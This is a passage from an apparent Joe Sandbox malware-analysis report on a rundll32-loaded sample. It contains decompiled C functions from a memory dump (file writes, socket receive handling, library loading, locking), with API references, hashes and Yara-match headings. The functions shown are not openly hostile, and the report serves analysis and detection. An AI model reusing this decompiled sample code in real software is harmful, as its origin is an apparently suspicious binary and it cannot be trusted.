                                                                                              						return 2;
                                                                                              					}
                                                                                              				} else {
                                                                                              					return 1;
                                                                                              				}
                                                                                              				L15:
                                                                                              			}













                                                                                              0x04271b04
                                                                                              0x04271b0a
                                                                                              0x04271b17
                                                                                              0x04271b18
                                                                                              0x04271b1c
                                                                                              0x04271b26
                                                                                              0x04271b2f
                                                                                              0x04271b35
                                                                                              0x04271b42
                                                                                              0x04271b47
                                                                                              0x04271b4c
                                                                                              0x00000000
                                                                                              0x04271b4e
                                                                                              0x04271b57
                                                                                              0x04271b5c
                                                                                              0x04271b5f
                                                                                              0x04271b64
                                                                                              0x04271ba4
                                                                                              0x04271ba7
                                                                                              0x04271bc8
                                                                                              0x04271bd2
                                                                                              0x04271bdd
                                                                                              0x04271ba9
                                                                                              0x04271ba9
                                                                                              0x00000000
                                                                                              0x04271ba9
                                                                                              0x04271b66
                                                                                              0x04271b66
                                                                                              0x04271b6c
                                                                                              0x04271b72
                                                                                              0x04271b7c
                                                                                              0x04271b80
                                                                                              0x04271b8a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04271b95
                                                                                              0x04271b9a
                                                                                              0x04271b9d
                                                                                              0x04271ba2
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04271ba2
                                                                                              0x00000000
                                                                                              0x04271b66
                                                                                              0x04271b64
                                                                                              0x04271b37
                                                                                              0x04271b37
                                                                                              0x04271b37
                                                                                              0x00000000
                                                                                              0x04271b37
                                                                                              0x04271b28
                                                                                              0x04271b28
                                                                                              0x04271bae
                                                                                              0x04271bae
                                                                                              0x04271bb4
                                                                                              0x04271bb5
                                                                                              0x04271bc4
                                                                                              0x04271bc4
                                                                                              0x04271b0c
                                                                                              0x04271b13
                                                                                              0x04271b13
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 04271B1C
                                                                                              • WSASetLastError.WS2_32(0000000D), ref: 04271BAE
                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 04271BB5
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$EnterErrorLastLeave
                                                                                              • String ID:
                                                                                              • API String ID: 4082018349-0
                                                                                              • Opcode ID: 7546fb31454a16f1760f451f87b040407eb92d383f8657110892216ed7785c93
                                                                                              • Instruction ID: 68c23f6660ab56c32f33370458126452240678767bda18d73360013800e69aa8
                                                                                              • Opcode Fuzzy Hash: 7546fb31454a16f1760f451f87b040407eb92d383f8657110892216ed7785c93
                                                                                              • Instruction Fuzzy Hash: 8321D1723102059BEB149F28E884BAA7769EF85324F148225F906CA385EB71F861CB95
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 51%
                                                                                              			E04255910(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8) {
                                                                                              				signed int _v8;
                                                                                              				intOrPtr _v15;
                                                                                              				long _v19;
                                                                                              				char _v20;
                                                                                              				char _v24;
                                                                                              				long _v28;
                                                                                              				long _v32;
                                                                                              				long _v36;
                                                                                              				void* _v40;
                                                                                              				signed int _t26;
                                                                                              				WCHAR* _t32;
                                                                                              				char* _t34;
                                                                                              				long _t44;
                                                                                              				intOrPtr* _t46;
                                                                                              				void* _t54;
                                                                                              				void* _t56;
                                                                                              				signed int _t57;
                                                                                              
                                                                                              				_t26 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t26 ^ _t57;
                                                                                              				_t54 = __ecx;
                                                                                              				_v32 = 0;
                                                                                              				_t46 = _a4;
                                                                                              				_t44 =  *(_t46 + 4);
                                                                                              				_v40 = _t46 + 8;
                                                                                              				_v28 =  *_t46;
                                                                                              				_v36 = _a8 + 0xfffffff8;
                                                                                              				_t32 = __ecx + 0x18;
                                                                                              				if( *((intOrPtr*)(__ecx + 0x2c)) >= 8) {
                                                                                              					_t32 =  *_t32;
                                                                                              				}
                                                                                              				_t56 = CreateFileW(_t32, 0x40000000, 2, 0, 3, 0x80, 0);
                                                                                              				if(_t56 == 0xffffffff) {
                                                                                              					_push(_t46);
                                                                                              					_push(0x3f);
                                                                                              					_v24 = 0x73;
                                                                                              					_t34 =  &_v24;
                                                                                              					_push(1);
                                                                                              				} else {
                                                                                              					SetFilePointer(_t56, _t44,  &_v28, 0);
                                                                                              					WriteFile(_t56, _v40, _v36,  &_v32, 0);
                                                                                              					CloseHandle(_t56);
                                                                                              					_v20 = 0x71;
                                                                                              					_push(_t46);
                                                                                              					asm("adc eax, 0x0");
                                                                                              					_v15 = _t44 + _v32;
                                                                                              					_push(0x3f);
                                                                                              					_v19 = _v28;
                                                                                              					_t34 =  &_v20;
                                                                                              					_push(9);
                                                                                              				}
                                                                                              				E04251C60( *((intOrPtr*)(_t54 + 4)));
                                                                                              				return E04275AFE(_v8 ^ _t57, _t34);
                                                                                              			}




















                                                                                              0x04255916
                                                                                              0x0425591d
                                                                                              0x04255923
                                                                                              0x04255925
                                                                                              0x0425592c
                                                                                              0x0425592f
                                                                                              0x04255935
                                                                                              0x0425593a
                                                                                              0x04255947
                                                                                              0x0425594a
                                                                                              0x0425594d
                                                                                              0x0425594f
                                                                                              0x0425594f
                                                                                              0x0425596a
                                                                                              0x0425596f
                                                                                              0x042559ba
                                                                                              0x042559bb
                                                                                              0x042559bd
                                                                                              0x042559c1
                                                                                              0x042559c4
                                                                                              0x04255971
                                                                                              0x04255979
                                                                                              0x0425598c
                                                                                              0x04255993
                                                                                              0x042559a0
                                                                                              0x042559a7
                                                                                              0x042559a8
                                                                                              0x042559ab
                                                                                              0x042559ae
                                                                                              0x042559b0
                                                                                              0x042559b3
                                                                                              0x042559b6
                                                                                              0x042559b6
                                                                                              0x042559ca
                                                                                              0x042559df

                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000003,00000080,00000000,?), ref: 04255964
                                                                                              • SetFilePointer.KERNEL32(00000000,?,?,00000000), ref: 04255979
                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 0425598C
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 04255993
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: File$CloseCreateHandlePointerWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3604237281-0
                                                                                              • Opcode ID: e12c195bde66b897e5eff26813bf5bc63b56dc637a2e6b172505aea39ab4c8b5
                                                                                              • Instruction ID: 8b4d6d69adac57ba72ccdd238b9c9069db5ccb1c3d396fe52e023d7ecb1be0f3
                                                                                              • Opcode Fuzzy Hash: e12c195bde66b897e5eff26813bf5bc63b56dc637a2e6b172505aea39ab4c8b5
                                                                                              • Instruction Fuzzy Hash: 20216171A00209BFEB00DFA8DC45FEEB7B8EF48714F504229E614A7280D775AE45CB94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 50%
                                                                                              			E0426E3B0(long __eax, intOrPtr* __ecx) {
                                                                                              				long _t20;
                                                                                              				long _t27;
                                                                                              				intOrPtr* _t30;
                                                                                              				intOrPtr* _t32;
                                                                                              				void* _t33;
                                                                                              				intOrPtr* _t34;
                                                                                              
                                                                                              				_t20 = __eax;
                                                                                              				_t34 = __ecx;
                                                                                              				if( *((intOrPtr*)(__ecx + 0x184)) != 0) {
                                                                                              					L18:
                                                                                              					return 1;
                                                                                              				} else {
                                                                                              					do {
                                                                                              						__imp__#16( *((intOrPtr*)(_t34 + 0x1c)),  *((intOrPtr*)(_t34 + 0x5c)),  *((intOrPtr*)(_t34 + 0x2c)), 0);
                                                                                              						_t27 = _t20;
                                                                                              						if(_t27 <= 0) {
                                                                                              							if(_t27 != 0xffffffff) {
                                                                                              								if(_t27 == 0) {
                                                                                              									 *(_t34 + 0x188) = _t27;
                                                                                              								}
                                                                                              								goto L17;
                                                                                              							} else {
                                                                                              								__imp__#111();
                                                                                              								if(_t20 == 0x2733) {
                                                                                              									goto L18;
                                                                                              								} else {
                                                                                              									if(_t20 == 0x2744) {
                                                                                              										goto L17;
                                                                                              									} else {
                                                                                              										if(_t20 != 0x2746) {
                                                                                              											goto L9;
                                                                                              										} else {
                                                                                              											goto L17;
                                                                                              										}
                                                                                              									}
                                                                                              								}
                                                                                              							}
                                                                                              						} else {
                                                                                              							 *(_t34 + 0x188) = 0;
                                                                                              							if(_t27 != 0x10) {
                                                                                              								L7:
                                                                                              								SetLastError(0);
                                                                                              								_t20 =  *((intOrPtr*)( *_t34 + 0x8c))( *((intOrPtr*)(_t34 + 0x5c)), _t27);
                                                                                              								if(_t20 != 2) {
                                                                                              									goto L17;
                                                                                              								} else {
                                                                                              									_t20 =  ==  ? 0x4c7 : GetLastError();
                                                                                              									L9:
                                                                                              									 *(_t34 + 0xc) = 1;
                                                                                              									 *((intOrPtr*)(_t34 + 0x10)) = 4;
                                                                                              									 *(_t34 + 0x14) = _t20;
                                                                                              									 *(_t34 + 0x18) = 1;
                                                                                              									return 0;
                                                                                              								}
                                                                                              							} else {
                                                                                              								_t30 =  *((intOrPtr*)(_t34 + 0x5c));
                                                                                              								_t7 = _t20 - 4; // -4
                                                                                              								_t33 = _t7;
                                                                                              								_t32 = 0x429f78c;
                                                                                              								while( *_t30 ==  *_t32) {
                                                                                              									_t30 = _t30 + 4;
                                                                                              									_t32 = _t32 + 4;
                                                                                              									_t33 = _t33 - 4;
                                                                                              									if(_t33 >= 0) {
                                                                                              										continue;
                                                                                              									} else {
                                                                                              										 *(_t34 + 0xc) = 1;
                                                                                              										 *((intOrPtr*)(_t34 + 0x10)) = 5;
                                                                                              										 *(_t34 + 0x14) = 0;
                                                                                              										 *(_t34 + 0x18) = 0;
                                                                                              										return 0;
                                                                                              									}
                                                                                              									goto L19;
                                                                                              								}
                                                                                              								goto L7;
                                                                                              							}
                                                                                              						}
                                                                                              						goto L19;
                                                                                              						L17:
                                                                                              					} while ( *((intOrPtr*)(_t34 + 0x184)) == 0);
                                                                                              					goto L18;
                                                                                              				}
                                                                                              				L19:
                                                                                              			}









                                                                                              0x0426e3b0
                                                                                              0x0426e3b2
                                                                                              0x0426e3bc
                                                                                              0x0426e4ae
                                                                                              0x0426e4b4
                                                                                              0x0426e3c2
                                                                                              0x0426e3c2
                                                                                              0x0426e3cd
                                                                                              0x0426e3d3
                                                                                              0x0426e3d7
                                                                                              0x0426e476
                                                                                              0x0426e497
                                                                                              0x0426e499
                                                                                              0x0426e499
                                                                                              0x00000000
                                                                                              0x0426e478
                                                                                              0x0426e478
                                                                                              0x0426e483
                                                                                              0x00000000
                                                                                              0x0426e485
                                                                                              0x0426e48a
                                                                                              0x00000000
                                                                                              0x0426e48c
                                                                                              0x0426e491
                                                                                              0x00000000
                                                                                              0x0426e493
                                                                                              0x00000000
                                                                                              0x0426e493
                                                                                              0x0426e491
                                                                                              0x0426e48a
                                                                                              0x0426e483
                                                                                              0x0426e3dd
                                                                                              0x0426e3dd
                                                                                              0x0426e3ea
                                                                                              0x0426e42a
                                                                                              0x0426e42c
                                                                                              0x0426e43a
                                                                                              0x0426e443
                                                                                              0x00000000
                                                                                              0x0426e445
                                                                                              0x0426e452
                                                                                              0x0426e455
                                                                                              0x0426e455
                                                                                              0x0426e45c
                                                                                              0x0426e463
                                                                                              0x0426e469
                                                                                              0x0426e472
                                                                                              0x0426e472
                                                                                              0x0426e3ec
                                                                                              0x0426e3ec
                                                                                              0x0426e3ef
                                                                                              0x0426e3ef
                                                                                              0x0426e3f2
                                                                                              0x0426e3f7
                                                                                              0x0426e3fd
                                                                                              0x0426e400
                                                                                              0x0426e403
                                                                                              0x0426e406
                                                                                              0x00000000
                                                                                              0x0426e409
                                                                                              0x0426e409
                                                                                              0x0426e412
                                                                                              0x0426e419
                                                                                              0x0426e420
                                                                                              0x0426e429
                                                                                              0x0426e429
                                                                                              0x00000000
                                                                                              0x0426e406
                                                                                              0x00000000
                                                                                              0x0426e3f7
                                                                                              0x0426e3ea
                                                                                              0x00000000
                                                                                              0x0426e49f
                                                                                              0x0426e49f
                                                                                              0x00000000
                                                                                              0x0426e3c2
                                                                                              0x00000000

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$recv
                                                                                              • String ID:
                                                                                              • API String ID: 316788870-0
                                                                                              • Opcode ID: af684291a77e16ea10a83fa1558473595e22e8eabbaf5e8ed63011d3be52d0b2
                                                                                              • Instruction ID: 53bf866cc112bda73a645925554038217efecc630dfffd2c42d70f4d83ab1fc0
                                                                                              • Opcode Fuzzy Hash: af684291a77e16ea10a83fa1558473595e22e8eabbaf5e8ed63011d3be52d0b2
                                                                                              • Instruction Fuzzy Hash: 3E21A1753107019FE7309F78E488766BBE5EB04325F21892DE947C6290CBB9B8C59B40
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 95%
                                                                                              			E04275300(signed int* __ecx, intOrPtr* _a8) {
                                                                                              				signed int _v8;
                                                                                              				signed int _t30;
                                                                                              				LONG* _t31;
                                                                                              				signed int _t53;
                                                                                              				long _t60;
                                                                                              				signed int* _t64;
                                                                                              
                                                                                              				_push(__ecx);
                                                                                              				_t64 = __ecx;
                                                                                              				if( *((intOrPtr*)(__ecx + 4)) != 0) {
                                                                                              					if( *((intOrPtr*)(__ecx + 0xc4)) >=  *((intOrPtr*)(__ecx))) {
                                                                                              						goto L1;
                                                                                              					} else {
                                                                                              						while(1) {
                                                                                              							_t60 = _t64[0x21];
                                                                                              							_t30 = _t64[1];
                                                                                              							_t53 = _t60 %  *_t64;
                                                                                              							_t31 = _t30 + _t53 * 4;
                                                                                              							_v8 = _t53;
                                                                                              							if( *(_t30 + _t53 * 4) == 0 && InterlockedCompareExchange(_t31, 1, 0) == 0) {
                                                                                              								break;
                                                                                              							}
                                                                                              							InterlockedCompareExchange( &(_t64[0x21]), _t60 + 1, _t60);
                                                                                              							if(_t64[0x31] <  *_t64) {
                                                                                              								continue;
                                                                                              							} else {
                                                                                              								return 0;
                                                                                              							}
                                                                                              							goto L9;
                                                                                              						}
                                                                                              						InterlockedIncrement( &(_t64[0x31]));
                                                                                              						InterlockedCompareExchange( &(_t64[0x21]), _t60 + 1, _t60);
                                                                                              						 *_a8 = _v8 + 1 + ( *(_t64[0x11] + _v8) & 0x000000ff) *  *_t64;
                                                                                              						return 1;
                                                                                              					}
                                                                                              				} else {
                                                                                              					L1:
                                                                                              					return 0;
                                                                                              				}
                                                                                              				L9:
                                                                                              			}









                                                                                              0x04275303
                                                                                              0x04275305
                                                                                              0x0427530b
                                                                                              0x0427531e
                                                                                              0x00000000
                                                                                              0x04275320
                                                                                              0x04275328
                                                                                              0x04275328
                                                                                              0x0427533a
                                                                                              0x0427533d
                                                                                              0x04275343
                                                                                              0x04275346
                                                                                              0x04275349
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04275362
                                                                                              0x0427536c
                                                                                              0x00000000
                                                                                              0x0427536e
                                                                                              0x04275376
                                                                                              0x04275376
                                                                                              0x00000000
                                                                                              0x0427536c
                                                                                              0x04275380
                                                                                              0x04275392
                                                                                              0x042753aa
                                                                                              0x042753b4
                                                                                              0x042753b4
                                                                                              0x0427530d
                                                                                              0x0427530d
                                                                                              0x04275313
                                                                                              0x04275313
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • InterlockedCompareExchange.KERNEL32(00000000,00000001,00000000), ref: 04275350
                                                                                              • InterlockedCompareExchange.KERNEL32(?,?,?), ref: 04275362
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CompareExchangeInterlocked
                                                                                              • String ID:
                                                                                              • API String ID: 3335655927-0
                                                                                              • Opcode ID: 4265a005fc58990629d3c829632e7ed69efcb3ad0857c2c3411c367c1354fec2
                                                                                              • Instruction ID: ad5110f4f17bc22154ba49aa0a632ccf4f1c8d9e71c4f6225b04bafe0b77b53d
                                                                                              • Opcode Fuzzy Hash: 4265a005fc58990629d3c829632e7ed69efcb3ad0857c2c3411c367c1354fec2
                                                                                              • Instruction Fuzzy Hash: 52216D72614605AFD724DF69D880F96F3EDFB49310F40496EEA89C3640DB71F9548BA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0426EAF0(intOrPtr* __ecx, intOrPtr _a4) {
                                                                                              				intOrPtr _t27;
                                                                                              				intOrPtr _t33;
                                                                                              				intOrPtr _t39;
                                                                                              				intOrPtr _t40;
                                                                                              				intOrPtr* _t41;
                                                                                              				struct _CRITICAL_SECTION* _t42;
                                                                                              
                                                                                              				_t41 = __ecx;
                                                                                              				_t42 = __ecx + 0x14c;
                                                                                              				EnterCriticalSection(_t42);
                                                                                              				if( *((intOrPtr*)( *_t41 + 0x40))() != 0) {
                                                                                              					_t40 = _a4;
                                                                                              					_t33 =  *((intOrPtr*)(_t41 + 0x180));
                                                                                              					 *((intOrPtr*)(_t41 + 0x180)) =  *((intOrPtr*)(_t41 + 0x180)) +  *((intOrPtr*)( *((intOrPtr*)(_t40 + 4)) + 0x18)) -  *((intOrPtr*)( *((intOrPtr*)(_t40 + 4)) + 0x14));
                                                                                              					_t39 =  *((intOrPtr*)(_t40 + 4));
                                                                                              					 *((intOrPtr*)(_t40 + 4)) = 0;
                                                                                              					_t27 =  *((intOrPtr*)(_t41 + 0x16c));
                                                                                              					if(_t27 == 0) {
                                                                                              						 *((intOrPtr*)(_t39 + 8)) = 0;
                                                                                              						 *((intOrPtr*)(_t39 + 4)) = 0;
                                                                                              						 *((intOrPtr*)(_t41 + 0x168)) = _t39;
                                                                                              					} else {
                                                                                              						 *((intOrPtr*)(_t27 + 4)) = _t39;
                                                                                              						 *((intOrPtr*)(_t39 + 8)) =  *((intOrPtr*)(_t41 + 0x16c));
                                                                                              					}
                                                                                              					 *((intOrPtr*)(_t41 + 0x164)) =  *((intOrPtr*)(_t41 + 0x164)) + 1;
                                                                                              					 *((intOrPtr*)(_t41 + 0x16c)) = _t39;
                                                                                              					LeaveCriticalSection(_t42);
                                                                                              					if(_t33 == 0 &&  *((intOrPtr*)(_t41 + 0x180)) > 0) {
                                                                                              						SetEvent( *(_t41 + 0x174));
                                                                                              					}
                                                                                              					return 0;
                                                                                              				} else {
                                                                                              					LeaveCriticalSection(_t42);
                                                                                              					return 0x139f;
                                                                                              				}
                                                                                              			}









                                                                                              0x0426eaf5
                                                                                              0x0426eaf7
                                                                                              0x0426eafe
                                                                                              0x0426eb0d
                                                                                              0x0426eb21
                                                                                              0x0426eb25
                                                                                              0x0426eb34
                                                                                              0x0426eb3a
                                                                                              0x0426eb3d
                                                                                              0x0426eb44
                                                                                              0x0426eb4c
                                                                                              0x0426eb5c
                                                                                              0x0426eb63
                                                                                              0x0426eb6a
                                                                                              0x0426eb4e
                                                                                              0x0426eb4e
                                                                                              0x0426eb57
                                                                                              0x0426eb57
                                                                                              0x0426eb70
                                                                                              0x0426eb77
                                                                                              0x0426eb7d
                                                                                              0x0426eb86
                                                                                              0x0426eb97
                                                                                              0x0426eb97
                                                                                              0x0426eba2
                                                                                              0x0426eb0f
                                                                                              0x0426eb10
                                                                                              0x0426eb1e
                                                                                              0x0426eb1e

                                                                                              APIs
                                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 0426EAFE
                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 0426EB10
                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 0426EB7D
                                                                                              • SetEvent.KERNEL32(?,?,0426E994,?,?,00000000,?,?,00000000), ref: 0426EB97
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$Leave$EnterEvent
                                                                                              • String ID:
                                                                                              • API String ID: 3394196147-0
                                                                                              • Opcode ID: 9a3e69138db9166e4c7bcd612e61bc3956c855bccd6999e6c5ee6b86831ed816
                                                                                              • Instruction ID: 053f5f3168d8298a28167d2b4a7bb4e1f0d78688add68939faa56842522b11d6
                                                                                              • Opcode Fuzzy Hash: 9a3e69138db9166e4c7bcd612e61bc3956c855bccd6999e6c5ee6b86831ed816
                                                                                              • Instruction Fuzzy Hash: 44115E75300206AFD7089F69E488BE6FBA8FF09314F15822AE51A87301CB36E851CFD4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 95%
                                                                                              			E04288FF4(signed int _a4) {
                                                                                              				signed int _t9;
                                                                                              				void* _t13;
                                                                                              				signed int _t15;
                                                                                              				WCHAR* _t22;
                                                                                              				signed int _t24;
                                                                                              				signed int* _t25;
                                                                                              				void* _t27;
                                                                                              
                                                                                              				_t9 = _a4;
                                                                                              				_t25 = 0x42a7570 + _t9 * 4;
                                                                                              				_t24 =  *_t25;
                                                                                              				if(_t24 == 0) {
                                                                                              					_t22 =  *(0x4299d30 + _t9 * 4);
                                                                                              					_t27 = LoadLibraryExW(_t22, 0, 0x800);
                                                                                              					if(_t27 != 0) {
                                                                                              						L8:
                                                                                              						 *_t25 = _t27;
                                                                                              						if( *_t25 != 0) {
                                                                                              							FreeLibrary(_t27);
                                                                                              						}
                                                                                              						_t13 = _t27;
                                                                                              						L11:
                                                                                              						return _t13;
                                                                                              					}
                                                                                              					_t15 = GetLastError();
                                                                                              					if(_t15 != 0x57) {
                                                                                              						_t27 = 0;
                                                                                              					} else {
                                                                                              						_t15 = LoadLibraryExW(_t22, _t27, _t27);
                                                                                              						_t27 = _t15;
                                                                                              					}
                                                                                              					if(_t27 != 0) {
                                                                                              						goto L8;
                                                                                              					} else {
                                                                                              						 *_t25 = _t15 | 0xffffffff;
                                                                                              						_t13 = 0;
                                                                                              						goto L11;
                                                                                              					}
                                                                                              				}
                                                                                              				_t4 = _t24 + 1; // 0xd33db39e
                                                                                              				asm("sbb eax, eax");
                                                                                              				return  ~_t4 & _t24;
                                                                                              			}










                                                                                              0x04288ff9
                                                                                              0x04288ffd
                                                                                              0x04289004
                                                                                              0x04289008
                                                                                              0x04289016
                                                                                              0x0428902c
                                                                                              0x04289030
                                                                                              0x04289059
                                                                                              0x0428905b
                                                                                              0x0428905f
                                                                                              0x04289062
                                                                                              0x04289062
                                                                                              0x04289068
                                                                                              0x0428906a
                                                                                              0x00000000
                                                                                              0x0428906b
                                                                                              0x04289032
                                                                                              0x0428903b
                                                                                              0x0428904a
                                                                                              0x0428903d
                                                                                              0x04289040
                                                                                              0x04289046
                                                                                              0x04289046
                                                                                              0x0428904e
                                                                                              0x00000000
                                                                                              0x04289050
                                                                                              0x04289053
                                                                                              0x04289055
                                                                                              0x00000000
                                                                                              0x04289055
                                                                                              0x0428904e
                                                                                              0x0428900a
                                                                                              0x0428900f
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,?,00000001,?,04288F99,?,00000001,00000000,?,?,04289463,00000008,GetCurrentPackageId), ref: 04289026
                                                                                              • GetLastError.KERNEL32(?,04288F99,?,00000001,00000000,?,?,04289463,00000008,GetCurrentPackageId,0429A1F0,GetCurrentPackageId,00000000), ref: 04289032
                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,04288F99,?,00000001,00000000,?,?,04289463,00000008,GetCurrentPackageId,0429A1F0,GetCurrentPackageId,00000000), ref: 04289040
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 3177248105-0
                                                                                              • Opcode ID: b2003e66a1fedc2de642eb5387e9e47ecdb4b1cc72c6a1213fa52d1c983377b7
                                                                                              • Instruction ID: 2e13c8daf3b7a1425b65035c6afb703f87076776ef8d774a329067accdbdea8b
                                                                                              • Opcode Fuzzy Hash: b2003e66a1fedc2de642eb5387e9e47ecdb4b1cc72c6a1213fa52d1c983377b7
                                                                                              • Instruction Fuzzy Hash: AD01D8727363379BC731697CAC48A6A7798EB457657140528E906D7180DB24EC41C6E0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E04272920(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                              				long _v8;
                                                                                              				intOrPtr* _v12;
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				void* _t25;
                                                                                              				void _t29;
                                                                                              				long _t32;
                                                                                              				intOrPtr _t37;
                                                                                              				intOrPtr* _t39;
                                                                                              				intOrPtr _t48;
                                                                                              				struct _CRITICAL_SECTION* _t49;
                                                                                              				struct _CRITICAL_SECTION* _t52;
                                                                                              
                                                                                              				_t39 = __ecx;
                                                                                              				_t48 = _a4;
                                                                                              				_v12 = __ecx;
                                                                                              				_v8 = 0;
                                                                                              				if(_t48 == 0 ||  *((intOrPtr*)(_t48 + 0x30)) == 0) {
                                                                                              					return _t25;
                                                                                              				} else {
                                                                                              					_t5 = _t48 + 0x54; // 0x54
                                                                                              					_t52 = _t5;
                                                                                              					 *((intOrPtr*)(_t48 + 0x48)) = 0;
                                                                                              					EnterCriticalSection(_t52);
                                                                                              					_t49 = _t48 + 0x6c;
                                                                                              					EnterCriticalSection(_t49);
                                                                                              					_t37 = _a4;
                                                                                              					if( *((intOrPtr*)(_t37 + 0x30)) != 0) {
                                                                                              						 *((intOrPtr*)(_t37 + 0x30)) = 0;
                                                                                              						_v8 = 1;
                                                                                              					}
                                                                                              					LeaveCriticalSection(_t49);
                                                                                              					_t29 = LeaveCriticalSection(_t52);
                                                                                              					if(_v8 != 0) {
                                                                                              						_t54 = _v12;
                                                                                              						E04272B90(_v12, _t37, _a8, _a12, _a16, _t39);
                                                                                              						E042751B0(_t37, _t54 + 0x178, LeaveCriticalSection, _t54,  *((intOrPtr*)(_t37 + 4)), 0);
                                                                                              						_t32 = timeGetTime();
                                                                                              						_t42 = _t37 + 0x8c;
                                                                                              						 *((intOrPtr*)(_t37 + 0x34)) = _t32;
                                                                                              						E04275420( *((intOrPtr*)(_t37 + 0x98)), _t42);
                                                                                              						E04275860(_t54 + 0x378,  *((intOrPtr*)(_t54 + 0x1c)), 0);
                                                                                              						_t29 = E0426C930(_t54 + 0x2b4, _t37);
                                                                                              						if(_t29 == 0) {
                                                                                              							_t29 = E04274CA0(_t54 + 0x378, _t37);
                                                                                              						}
                                                                                              					}
                                                                                              					return _t29;
                                                                                              				}
                                                                                              			}
















                                                                                              0x04272920
                                                                                              0x04272927
                                                                                              0x0427292a
                                                                                              0x0427292d
                                                                                              0x04272936
                                                                                              0x042729ff
                                                                                              0x04272946
                                                                                              0x0427294e
                                                                                              0x0427294e
                                                                                              0x04272951
                                                                                              0x04272959
                                                                                              0x0427295b
                                                                                              0x0427295f
                                                                                              0x04272961
                                                                                              0x04272968
                                                                                              0x0427296a
                                                                                              0x04272971
                                                                                              0x04272971
                                                                                              0x0427297f
                                                                                              0x04272982
                                                                                              0x04272988
                                                                                              0x0427298a
                                                                                              0x0427299a
                                                                                              0x042729ad
                                                                                              0x042729b2
                                                                                              0x042729b8
                                                                                              0x042729be
                                                                                              0x042729c5
                                                                                              0x042729d5
                                                                                              0x042729e4
                                                                                              0x042729eb
                                                                                              0x042729f4
                                                                                              0x042729f4
                                                                                              0x042729eb
                                                                                              0x00000000
